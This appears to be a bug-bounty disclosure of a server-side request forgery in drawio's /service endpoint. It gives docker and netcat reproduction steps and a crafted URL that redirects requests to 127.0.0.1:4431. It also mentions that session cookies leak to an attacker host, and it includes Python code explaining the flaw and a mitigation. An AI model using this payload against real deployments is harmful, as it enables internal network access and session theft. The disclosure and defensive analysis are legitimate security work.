
SSRF in /service endpoint

2022-05-2017:41:08
amammad
www.huntr.dev
Tags: ssrf, endpoint, exploitation, payload, export_url, docker, drawio, http logger, jsessionid cookie

EPSS: 0.019
Percentile: 88.7%

Description

The problem came from this line of code

I ran docker-drawio with the following command:

docker run -it --rm --name="draw" -e EXPORT_URL=http://somesite.com -p 8080:8080 -p 8443:8443 jgraph/drawio

If the drawio EXPORT_URL is set to an address without any / after the primary hostname, like http://somesite.com (not http://somesite.com/something or http://somesite.com/), then an attacker can send a request to 127.0.0.1:4431 with a payload like http://drawio-instance/service/0/@127.0.0.1:4431
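The root cause described above is a URL built by plain string concatenation: when EXPORT_URL has no trailing slash, a request path beginning with "@" turns the configured hostname into the userinfo part of the resulting URL, and the real host becomes whatever follows the "@". The following Python snippet is an added illustration for defenders and is not drawio's code; build_target_naive is a hypothetical stand-in for the vulnerable concatenation, and build_target_checked shows one mitigation: always join on a slash-terminated base path and re-parse the result to confirm the scheme, host and port still match the configured export server. The export URL and attacker path below are constructed sample values.

```python
from urllib.parse import urlsplit, urlunsplit

# Constructed sample values: the configured export server and the path
# segment an attacker would supply after /service/<n>/ .
EXPORT_URL_NO_SLASH = "http://somesite.com"
EXPORT_URL_WITH_SLASH = "http://somesite.com/"
ATTACKER_PATH = "@127.0.0.1:4431"


def build_target_naive(export_url, path):
    """Hypothetical stand-in for the vulnerable behaviour: the request
    path is glued directly onto EXPORT_URL with no separator and no
    validation."""
    return export_url + path


def effective_host(url):
    """Host and port a standards-compliant HTTP client would connect to."""
    parts = urlsplit(url)
    return parts.hostname, parts.port


def build_target_checked(export_url, path):
    """Mitigated builder: join on a slash-terminated base path, then
    re-parse and refuse any result whose origin differs from the
    configured export server."""
    base = urlsplit(export_url)
    if base.scheme not in ("http", "https") or not base.hostname:
        raise ValueError("EXPORT_URL must be an absolute http(s) URL")
    base_path = base.path if base.path.endswith("/") else base.path + "/"
    candidate = urlunsplit((base.scheme, base.netloc, base_path + path, "", ""))
    got = urlsplit(candidate)
    if (got.scheme, got.hostname, got.port) != (base.scheme, base.hostname, base.port):
        raise ValueError("request would leave the configured export host")
    return candidate


def origin_preserved(export_url, path):
    """True when the checked builder keeps the request on the export host."""
    try:
        build_target_checked(export_url, path)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for base in (EXPORT_URL_NO_SLASH, EXPORT_URL_WITH_SLASH):
        naive = build_target_naive(base, ATTACKER_PATH)
        print(f"naive   {base!r:24} -> {naive}  host={effective_host(naive)}")
        checked = build_target_checked(base, ATTACKER_PATH)
        print(f"checked {base!r:24} -> {checked}  host={effective_host(checked)}")
```

With the slash-less base the naive builder yields http://somesite.com@127.0.0.1:4431, whose effective host is 127.0.0.1:4431, which is exactly the redirect the report exercises; with a trailing slash the "@" stays inside the path. The checked builder produces http://somesite.com/@127.0.0.1:4431 in both cases and would raise rather than return a URL whose origin differs from EXPORT_URL, so a mismatch becomes a logged error instead of an outbound request.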

Proof of Concept

  1. Run docker run -it --rm --name="draw" -e EXPORT_URL=http://google.com -p 8080:8080 -p 8443:8443 jgraph/drawio, then run docker ps and note the drawio container hash name (called HN).
  2. Run docker exec -it HN /bin/bash
  3. Run apt update && apt install netcat && netcat -l 4430
  4. Go to http://drawio-instance:8080/service/0/@127.0.0.1:4431
    You can see that the HTTP request has been recorded in the netcat log.

It is a full SSRF. If you need another PoC, I can give you an HTTP logger script that returns some things to the attacker.

Also, I don't know what exactly the JSESSIONID cookie is, but I can receive its content at my public IP after the redirect too!
